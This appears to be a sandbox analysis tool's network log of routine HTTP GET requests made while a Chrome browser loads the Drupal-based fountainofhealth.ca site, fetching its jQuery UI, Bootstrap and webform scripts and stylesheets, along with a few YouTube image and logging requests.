Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/modules/views/css/views.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/ajax_loader/css/wave.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery/jquery.min.js?v=3.7.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/keycode-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/controlgroup-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/drupal.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/draggable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/checkboxradio-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-blur-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/dialog-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/ajax.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/message.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/progress.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/drupal.bootstrap.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/progress.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/script.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/thrivequestion.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/google_analytics/js/google_analytics.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /modules/webform/js/webform.behaviors.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/resizable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/custom.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/theme.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/ajax_loader/js/ajax-throbber.js?v=1.x HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/attributes.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
